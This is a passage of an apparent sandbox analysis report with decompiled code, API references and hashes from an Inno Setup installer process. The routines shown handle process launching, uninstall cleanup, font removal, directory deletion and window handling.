Instruction Fuzzy Hash: B131C930F002049BCB11EBA6C842A5EBAB8EB49749F51447BFD04E7353D63C9D44CA6D

Uniqueness

Uniqueness Score: -1.00%

Function 00453738 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00453738(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, DWORD* _a4, intOrPtr* _a8, intOrPtr _a12, char _a16, char _a20, char _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _t41;
				void* _t42;
				void* _t61;
				intOrPtr _t71;
				intOrPtr* _t74;
				DWORD* _t76;
				void* _t79;

				_v12 = __ecx;
				_t61 = __edx;
				_v8 = __eax;
				_t76 = _a4;
				_t74 = _a8;
				E00403870(_a24);
				_push(_t79);
				_push(0x453849);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffbc;
				if(_a24 == 0) {
					E0042C990(_t61, __ecx,  &_a24);
				}
				E00402A64( &_v72, 0x3c);
				_v72 = 0x3c;
				_v68 = 0x540;
				_v60 = _v8;
				_v56 = E00403880(_t61);
				_v52 = E00403880(_v12);
				if(_a24 != 0) {
					_v48 = E00403880(_a24);
				}
				_v44 = _a12;
				_t41 =  &_v72;
				_push(_t41);
				L0042CD94();
				asm("sbb ebx, ebx");
				if( ~( ~_t41) != 0) {
					 *_t76 = 0x103;
					_t42 = _v16;
					if(_t42 != 0) {
						if(_a16 != 0) {
							WaitForInputIdle(_t42, 0xffffffff);
						}
						if(_a20 != 0) {
							do {
								if(_t74 != 0) {
									 *_t74();
								}
							} while (MsgWaitForMultipleObjects(1,  &_v16, 0, 0xffffffff, 0xff) == 1);
						}
						GetExitCodeProcess(_v16, _t76);
						CloseHandle(_v16);
					}
				} else {
					 *_t76 = GetLastError();
				}
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(E00453850);
				return E00403548( &_a24);
			}

0x00453741
0x00453744
0x00453746
0x00453749
0x0045374c
0x00453752
0x00453759
0x0045375a
0x0045375f
0x00453762
0x00453769
0x00453770
0x00453770
0x0045377f
0x00453784
0x0045378b
0x00453795
0x0045379f
0x004537aa
0x004537b1
0x004537bb
0x004537bb
0x004537c1
0x004537c4
0x004537c7
0x004537c8
0x004537d1
0x004537d7
0x004537e2
0x004537e8
0x004537ed
0x004537f3
0x004537f8
0x004537f8
0x00453801
0x00453803
0x00453805
0x00453807
0x00453807
0x0045381d
0x00453803
0x00453825
0x0045382e
0x0045382e
0x004537d9
0x004537de
0x004537de
0x00453835
0x00453838
0x0045383b
0x00453848

APIs

ShellExecuteEx.SHELL32(?), ref: 004537C8
GetLastError.KERNEL32(00000000,00453849,?,?,?,00000001), ref: 004537D9
WaitForInputIdle.USER32 ref: 004537F8
MsgWaitForMultipleObjects.USER32 ref: 00453818
GetExitCodeProcess.KERNEL32 ref: 00453825
CloseHandle.KERNEL32(?,?,?,00000000,00453849,?,?,?,00000001), ref: 0045382E

Strings

<, xrefs: 00453784

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Wait$CloseCodeErrorExecuteExitHandleIdleInputLastMultipleObjectsProcessShell
String ID: <
API String ID: 35504260-4251816714
Opcode ID: b2ba742db5d81f986fb40ac37e429383c2d1683df280d7fd3a0eb1e508c6d42f
Instruction ID: 19bdc7582aaa65dc05582aab2205611e8884212ec1b9ce2d622807a5c7ecd4f2
Opcode Fuzzy Hash: b2ba742db5d81f986fb40ac37e429383c2d1683df280d7fd3a0eb1e508c6d42f
Instruction Fuzzy Hash: 213154B1A00209ABDB14EFA5C841B9E7BF8EF08355F10457AF810E73D2D7789A44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00488F98 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79
sleepsynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00488F98(void* __eflags) {
				long _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t17;
				intOrPtr _t19;
				struct HWND__* _t25;
				struct HWND__* _t29;
				intOrPtr _t33;
				void* _t35;
				void* _t42;
				void* _t43;
				intOrPtr _t45;

				E00455814("Deleting Uninstall data files.", _t35, _t42, _t43);
				_push(0x488fd7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45;
				E00450194(0);
				_t9 =  *0x4ae334; // 0x0
				E00450220(_t9);
				 *[fs:eax] = 0;
				E0042E314(0x4ae334);
				_t14 =  *0x4ae32c; // 0x0
				E00407064(_t14);
				if( *0x4ae330 != 0) {
					_t33 =  *0x4ae330; // 0x0
					E00407064(_t33);
				}
				if( *0x4ae348 != 0) {
					_v8 = 0;
					_t25 =  *0x4ae348; // 0x0
					GetWindowThreadProcessId(_t25,  &_v8);
					_t35 = OpenProcess(0x1f0000, 0, _v8);
					_t29 =  *0x4ae348; // 0x0
					SendMessageA(_t29, 0x54d, 0, 0);
					WaitForSingleObject(_t35, 0xffffffff);
					CloseHandle(_t35);
					Sleep(0x1f4);
				}
				 *0x48cefc = 0;
				_t17 =  *0x4ae328; // 0x0
				E00453B24(_t17, 0xd, 0xfa);
				if( *0x48deec != 0) {
					E00455150(0, _t35, _t42, _t43, 0);
				}
				_t19 =  *0x48d628; // 0x21d2410
				return E00424458(_t19);
			}

0x00488fa4
0x00488fac
0x00488fb1
0x00488fb4
0x00488fbe
0x00488fc3
0x00488fc8
0x00488fd2
0x00488fe6
0x00488feb
0x00488ff0
0x00488ffc
0x00488ffe
0x00489003
0x00489003
0x0048900f
0x00489013
0x0048901a
0x00489020
0x00489035
0x00489040
0x00489046
0x0048904e
0x00489054
0x0048905e
0x0048905e
0x00489065
0x00489079
0x0048907e
0x0048908a
0x0048908e
0x0048908e
0x00489093
0x004890a2

APIs

Part of subcall function 00455814: GetLocalTime.KERNEL32(?,00000000,0045599B,?,?,0048DF10,00000000), ref: 00455844

Part of subcall function 00450220: SetEndOfFile.KERNEL32(?,00000000,00466FB2), ref: 00450227

Part of subcall function 00407064: 6D2B5F60.KERNEL32(00000000,0048D628,0048AE72,00000000,0048AEC7,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 0040706F

GetWindowThreadProcessId.USER32(00000000,?), ref: 00489020
OpenProcess.KERNEL32(001F0000,00000000,?,00000000,?), ref: 00489030
SendMessageA.USER32 ref: 00489046
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 0048904E
CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 00489054
Sleep.KERNEL32(000001F4,00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,001F0000,00000000,?,00000000,?), ref: 0048905E

Strings

Deleting Uninstall data files., xrefs: 00488F9F

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Process$CloseFileHandleLocalMessageObjectOpenSendSingleSleepThreadTimeWaitWindow
String ID: Deleting Uninstall data files.
API String ID: 2216181474-2568741658
Opcode ID: 4286c1e03cda3e5544ddb6a8588fdaee83b3d122faed67a6d8503bdde7830732
Instruction ID: fe6cd48beafd3510c5a101c6df8a14dacd9afa68e7183d732bfdb7814d3b5de9
Opcode Fuzzy Hash: 4286c1e03cda3e5544ddb6a8588fdaee83b3d122faed67a6d8503bdde7830732
Instruction Fuzzy Hash: D0217431604600AAEB10F77ADC42F6E37A8DB06715F50087BFA14DB2E2D9796C40CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 004543DC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004543DC(void* __eax, void* __ecx, void* __edx) {
				char _v12;
				int _t9;
				void* _t18;
				void** _t25;

				_push(__ecx);
				_t18 = __edx;
				_t24 = __eax;
				if( *0x48c0e0 == 1) {
					if(E0042DD88(0, "Software\\Microsoft\\Windows\\CurrentVersion\\Fonts", 0x80000002,  &_v12, 2, 0) == 0) {
						_push(E00403880(_t24));
						_push(_v12);
						L004058FC();
						RegCloseKey( *_t25);
					}
				} else {
					WriteProfileStringA("Fonts", E00403880(__eax), 0);
				}
				_t9 = RemoveFontResourceA(E00403880(_t18));
				if(_t9 != 0) {
					_t9 = SendNotifyMessageA(0xffff, 0x1d, 0, 0);
				}
				return _t9;
			}

0x004543de
0x004543df
0x004543e1
0x004543ea
0x0045441e
0x00454427
0x0045442c
0x0045442d
0x00454436
0x00454436
0x004543ec
0x004543fb
0x004543fb
0x00454443
0x0045444a
0x00454457
0x00454457
0x0045445f

APIs

WriteProfileStringA.KERNEL32(Fonts,00000000,00000000), ref: 004543FB
6D2B6690.ADVAPI32(?,00000000,?,00000002,00000000,?,?,00000000,004581A9,00000000,004581BC,?,?,00000000,0045892D), ref: 0045442D
RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,00000000,004581A9,00000000,004581BC,?,?,00000000,0045892D), ref: 00454436
RemoveFontResourceA.GDI32(00000000), ref: 00454443
SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00454457

Strings

Software\Microsoft\Windows\CurrentVersion\Fonts, xrefs: 0045440B
Fonts, xrefs: 004543F6

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6690CloseFontMessageNotifyProfileRemoveResourceSendStringWrite
String ID: Fonts$Software\Microsoft\Windows\CurrentVersion\Fonts
API String ID: 1297942735-48469607
Opcode ID: c0b917f47be563e0118564eaa3e2fab5ee2b39259c35b57d6157f5e9a0f8f548
Instruction ID: 3e2f8dfe88786a053fca54ca05dab6ffc48915f9bf3d619a2a0b34f93f057db8
Opcode Fuzzy Hash: c0b917f47be563e0118564eaa3e2fab5ee2b39259c35b57d6157f5e9a0f8f548
Instruction Fuzzy Hash: B2F06DB178070026E514B6A65C46F1B128C8B85B4AF10883FBA04EE1C3C57C9C89866D

Uniqueness

Uniqueness Score: -1.00%

Function 00451A10 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00451A10() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				char _t3;

				_push("Wow64DisableWow64FsRedirection");
				_t1 = GetModuleHandleA("kernel32.dll");
				_push(_t1);
				L00405AA4();
				 *0x48ded8 = _t1;
				_push("Wow64RevertWow64FsRedirection");
				_t2 = GetModuleHandleA("kernel32.dll");
				_push(_t2);
				L00405AA4();
				 *0x48dedc = _t2;
				if( *0x48ded8 == 0 ||  *0x48dedc == 0) {
					_t3 = 0;
				} else {
					_t3 = 1;
				}
				 *0x48dee0 = _t3;
				return _t3;
			}

0x00451a10
0x00451a1a
0x00451a1f
0x00451a20
0x00451a25
0x00451a2a
0x00451a34
0x00451a39
0x00451a3a
0x00451a3f
0x00451a4b
0x00451a56
0x00451a5a
0x00451a5a
0x00451a5a
0x00451a5c
0x00451a61

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,0048B2CD), ref: 00451A1A
6D2B5550.KERNEL32(00000000,kernel32.dll,Wow64DisableWow64FsRedirection,0048B2CD), ref: 00451A20
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,0048B2CD), ref: 00451A34
6D2B5550.KERNEL32(00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,0048B2CD), ref: 00451A3A

Strings

kernel32.dll, xrefs: 00451A15, 00451A2F
Wow64DisableWow64FsRedirection, xrefs: 00451A10
Wow64RevertWow64FsRedirection, xrefs: 00451A2A

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B5550HandleModule
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2448194625-4169039593
Opcode ID: f9c323d51dff7f64a1cfaf65feb9a1b26ba59bb30d9fb3a83d2bb632cb9b1757
Instruction ID: 23f670f5ba8875799172e84e61646f846bc3cd8155d7181d682e266633066b19
Opcode Fuzzy Hash: f9c323d51dff7f64a1cfaf65feb9a1b26ba59bb30d9fb3a83d2bb632cb9b1757
Instruction Fuzzy Hash: 22E01A30A17B41ACCE02E7B5588676A2354972838AF11193FA806AD1F3CBFC0C48CF1D

Uniqueness

Uniqueness Score: -1.00%

Function 00456AD4 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00456AD4(void* __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				char _v24;
				signed int _t43;
				intOrPtr _t50;
				void* _t64;
				void* _t70;
				void* _t75;
				intOrPtr _t87;
				signed int _t103;
				void* _t104;
				char _t106;
				void* _t109;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v24 = 0;
				_v8 = __ecx;
				_t106 = __edx;
				_t75 = __eax;
				_push(_t109);
				_push(0x456c56);
				_push( *[fs:eax]);
				 *[fs:eax] = _t109 + 0xffffffec;
				_t103 = E004515D4(__eax, __edx, __eflags);
				if(_t103 == 0xffffffff || (_t103 & 0x00000010) == 0) {
					_v9 = 1;
					goto L18;
				} else {
					_v20 = _t106;
					_v16 = 0xb;
					E00455A04("Deleting directory: %s", _t75, 0,  &_v20, _t103, _t106);
					if((_t103 & 0x00000001) == 0) {
						L9:
						_t43 = E004518A0(_t75, _t106, _t117);
						asm("sbb eax, eax");
						_v9 =  ~( ~_t43);
						if(_v9 != 0) {
							L18:
							_pop(_t87);
							 *[fs:eax] = _t87;
							_push(E00456C5D);
							return E00403548( &_v24);
						}
						_t104 = GetLastError();
						if(_v8 == 0) {
							__eflags = _a4;
							if(_a4 == 0) {
								L16:
								_v20 = _t104;
								_v16 = 0;
								E00455A04("Failed to delete directory (%d).", _t75, 0,  &_v20, _t104, _t106);
								goto L18;
							}
							_t50 = E0045692C(_a4, _t75, _t106, _t104, _t106);
							__eflags = _t50;
							if(_t50 == 0) {
								goto L16;
							}
							__eflags =  *0x48c0e0 - 2;
							if( *0x48c0e0 != 2) {
								goto L16;
							}
							_v20 = _t104;
							_v16 = 0;
							E00455A04("Failed to delete directory (%d). Will delete on restart (if empty).", _t75, 0,  &_v20, _t104, _t106);
							E00456A04(_t75, _t75, _t106, _t104, _t106);
							goto L18;
						}
						_v20 = _t104;
						_v16 = 0;
						E00455A04("Failed to delete directory (%d). Will retry later.", _t75, 0,  &_v20, _t104, _t106);
						E00403658();
						E004036C4( &_v24, _t106);
						E0045463C(_v8, 0, _v24);
						goto L18;
					}
					_t115 = _t103 & 0x00000400;
					if((_t103 & 0x00000400) != 0) {
						L5:
						_t64 = E00451918(_t75, _t103 & 0xfffffffe, _t106, _t116);
						_t117 = _t64;
						if(_t64 == 0) {
							E00455814("Failed to strip read-only attribute.", _t75, _t103, _t106);
						} else {
							E00455814("Stripped read-only attribute.", _t75, _t103, _t106);
						}
						goto L9;
					}
					_t70 = E004529A4(_t75, _t75, _t106, _t103, _t106, _t115);
					_t116 = _t70;
					if(_t70 == 0) {
						E00455814("Not stripping read-only attribute because the directory does not appear to be empty.", _t75, _t103, _t106);
						goto L9;
					}
					goto L5;
				}
			}

0x00456ada
0x00456adb
0x00456adc
0x00456adf
0x00456ae2
0x00456ae5
0x00456ae7
0x00456aeb
0x00456aec
0x00456af1
0x00456af4
0x00456b00
0x00456b05
0x00456c3c
0x00000000
0x00456b17
0x00456b17
0x00456b1a
0x00456b28
0x00456b33
0x00456b7e
0x00456b82
0x00456b89
0x00456b8d
0x00456b94
0x00456c40
0x00456c42
0x00456c45
0x00456c48
0x00456c55
0x00456c55
0x00456b9f
0x00456ba5
0x00456be6
0x00456bea
0x00456c24
0x00456c24
0x00456c27
0x00456c35
0x00000000
0x00456c35
0x00456bf1
0x00456bf6
0x00456bf8
0x00000000
0x00000000
0x00456bfa
0x00456c01
0x00000000
0x00000000
0x00456c03
0x00456c06
0x00456c14
0x00456c1d
0x00000000
0x00456c1d
0x00456ba7
0x00456baa
0x00456bb8
0x00456bca
0x00456bd4
0x00456bdf
0x00000000
0x00456bdf
0x00456b35
0x00456b3b
0x00456b4a
0x00456b53
0x00456b58
0x00456b5a
0x00456b6d
0x00456b5c
0x00456b61
0x00456b61
0x00000000
0x00456b5a
0x00456b41
0x00456b46
0x00456b48
0x00456b79
0x00000000
0x00456b79
0x00000000
0x00456b48

APIs

GetLastError.KERNEL32(00000000,00456C56,?,00000000,?,00000000), ref: 00456B9A

Part of subcall function 004529A4: FindClose.KERNEL32(?,00452A9A,?,?,?,?,?,00000000,00452A8F,?,00000000,00452AB3,?,00000000,?,00000000), ref: 00452A89

Part of subcall function 00455814: GetLocalTime.KERNEL32(?,00000000,0045599B,?,?,0048DF10,00000000), ref: 00455844

Strings

Deleting directory: %s, xrefs: 00456B23
Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00456B74
Failed to delete directory (%d)., xrefs: 00456C30
Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00456C0F
Failed to strip read-only attribute., xrefs: 00456B68
Failed to delete directory (%d). Will retry later., xrefs: 00456BB3
Stripped read-only attribute., xrefs: 00456B5C

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseErrorFindLastLocalTime
String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
API String ID: 3419951142-1448842058
Opcode ID: 29499b9cd6cb4e5d755ad539c71b2b00e2006f01482445e361d3dc7ec08ef4ac
Instruction ID: 84c743a0410eb2297aafacd5c3ce6d0873ba6ffa1fe70632517708c0d038b5e0
Opcode Fuzzy Hash: 29499b9cd6cb4e5d755ad539c71b2b00e2006f01482445e361d3dc7ec08ef4ac
Instruction Fuzzy Hash: AF41C430B002589ACB15EBB988413AE76E59F45306F92856BAC41DB393CB7D8E0DC75A

Uniqueness

Uniqueness Score: -1.00%

Function 00423068 Relevance: 12.1, APIs: 8, Instructions: 119
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00423068(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v26;
				struct HWND__* _v32;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t71;
				void* _t76;
				intOrPtr _t102;
				void* _t103;
				void* _t104;
				void* _t106;
				void* _t107;
				intOrPtr _t108;

				_t104 = __esi;
				_t103 = __edi;
				_t106 = _t107;
				_t108 = _t107 + 0xffffffe4;
				_push(__ebx);
				_v8 = __eax;
				E004142F8();
				if( *((char*)(_v8 + 0x37)) != 0 ||  *((char*)(_v8 + 0x38)) == 0 || ( *(_v8 + 0x119) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x116)) == 1) {
					E00408EA0(0x48d628, 0xf032, 1, _t103, _t104);
					E00403264();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x119) =  *(_v8 + 0x119) | 0x00000008;
				_v32 = GetActiveWindow();
				_t50 =  *0x48c580; // 0x0
				_v20 = _t50;
				_t51 =  *0x48d62c; // 0x21d0660
				_v24 =  *((intOrPtr*)(_t51 + 0x4c));
				_t53 =  *0x48d62c; // 0x21d0660
				 *((intOrPtr*)(_t53 + 0x4c)) = _v8;
				_t54 =  *0x48d62c; // 0x21d0660
				_v26 =  *((intOrPtr*)(_t54 + 0x28));
				_t56 =  *0x48d62c; // 0x21d0660
				E004235AC(_t56, 0);
				_v16 = E0041F0BC(0, 0x48d628, _t103, _t104);
				_push(_t106);
				_push(0x423252);
				_push( *[fs:edx]);
				 *[fs:edx] = _t108;
				E0042301C(_v8);
				_push(_t106);
				_push(0x4231fb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t108;
				SendMessageA(E004183F8(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x128)) = 0;
				do {
					E004246D4( *0x48d628, _t103, _t104);
					if( *((char*)( *0x48d628 + 0x7c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x128)) != 0) {
							E00422F6C(_v8, 0xf032);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x128)) = 2;
					}
					_t71 =  *((intOrPtr*)(_v8 + 0x128));
				} while (_t71 == 0);
				_v12 = _t71;
				SendMessageA(E004183F8(_v8), 0xb001, 0, 0);
				_t76 = E004183F8(_v8);
				if(_t76 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t102);
				 *[fs:eax] = _t102;
				_push(0x423202);
				return E00423014();
			}

0x00423068
0x00423068
0x00423069
0x0042306b
0x0042306e
0x0042306f
0x00423077
0x00423083
0x004230b2
0x004230b7
0x004230b7
0x004230c3
0x004230d1
0x004230d1
0x004230d6
0x004230de
0x004230ea
0x004230ed
0x004230f2
0x004230f5
0x004230fd
0x00423100
0x00423108
0x0042310b
0x00423114
0x0042311a
0x0042311f
0x0042312b
0x00423130
0x00423131
0x00423136
0x00423139
0x0042313f
0x00423146
0x00423147
0x0042314c
0x0042314f
0x00423164
0x0042316e
0x00423174
0x00423176
0x00423181
0x0042319c
0x004231a1
0x004231a1
0x00423183
0x00423186
0x00423186
0x004231a9
0x004231af
0x004231b3
0x004231c8
0x004231d0
0x004231de
0x004231e2
0x004231e2
0x004231e7
0x004231ea
0x004231ed
0x004231fa

APIs

GetCapture.USER32 ref: 004230BC
GetCapture.USER32 ref: 004230CB
SendMessageA.USER32 ref: 004230D1
ReleaseCapture.USER32(00000000,0000001F,00000000,00000000), ref: 004230D6
GetActiveWindow.USER32 ref: 004230E5
SendMessageA.USER32 ref: 00423164
SendMessageA.USER32 ref: 004231C8
GetActiveWindow.USER32 ref: 004231D7

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: 38ac66f14b542d8040d8ef116bc75a60cbba1e775dc8ecfc0c3ce9c84fc26233
Instruction ID: e237d19a7d432f7758038de8af73b4f44e79736eb620fb1854ff2c64df8d1a0f
Opcode Fuzzy Hash: 38ac66f14b542d8040d8ef116bc75a60cbba1e775dc8ecfc0c3ce9c84fc26233
Instruction Fuzzy Hash: 59417C30B00218AFDB10EFA9D982B9D77F1EB44304F5540BAF510AB2A2DB7D9E40DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00429698 Relevance: 12.1, APIs: 8, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00429698(struct HDC__* __eax, void* __ebp, void* __eflags) {
				struct tagTEXTMETRICA _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t14;
				signed int _t18;
				signed int _t20;
				struct HDC__* _t26;
				signed int _t27;
				signed int _t29;
				signed int _t30;
				void* _t31;
				void* _t35;
				struct HDC__* _t37;
				struct tagTEXTMETRICA* _t39;

				_t39 =  &_v112;
				_t37 = __eax;
				_push(0);
				L00406034();
				_t26 = __eax;
				GetTextMetricsA(__eax, _t39);
				_t14 = SelectObject(_t26, E0041A400( *((intOrPtr*)(_t37 + 0x44)), _t26, _t31, _t35, _t37));
				GetTextMetricsA(_t26,  &(_v112.tmMaxCharWidth));
				SelectObject(_t26, _t14);
				_push(_t26);
				_push(0);
				L0040621C();
				if( *0x48d5c4 == 0) {
					_t27 = _t39->tmHeight;
					_t18 = _v112.tmHeight;
					if(_t27 > _t18) {
						_t27 = _t18;
					}
					_t20 = GetSystemMetrics(6) << 2;
					if(_t27 < 0) {
						_t27 = _t27 + 3;
					}
					_t29 = _t20 + (_t27 >> 2);
				} else {
					if( *((char*)(_t37 + 0xc5)) == 0) {
						_t30 = 6;
					} else {
						_t30 = 8;
					}
					_t29 = GetSystemMetrics(6) * _t30;
				}
				return E00414854(_t37, _v112 + _t29);
			}

0x0042969b
0x0042969e
0x004296a0
0x004296a2
0x004296a7
0x004296ab
0x004296ba
0x004296c7
0x004296ce
0x004296d3
0x004296d4
0x004296d6
0x004296e2
0x00429706
0x00429709
0x0042970f
0x00429711
0x00429711
0x0042971a
0x0042971f
0x00429721
0x00429721
0x00429729
0x004296e4
0x004296eb
0x004296f4
0x004296ed
0x004296ed
0x004296ed
0x00429702
0x00429702
0x0042973e

APIs

740BAC50.USER32(00000000), ref: 004296A2
GetTextMetricsA.GDI32(00000000), ref: 004296AB

Part of subcall function 0041A400: CreateFontIndirectA.GDI32(?), ref: 0041A4BF

SelectObject.GDI32(00000000,00000000), ref: 004296BA
GetTextMetricsA.GDI32(00000000,?), ref: 004296C7
SelectObject.GDI32(00000000,00000000), ref: 004296CE
740BB380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004296D6
GetSystemMetrics.USER32 ref: 004296FB
GetSystemMetrics.USER32 ref: 00429715

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
String ID:
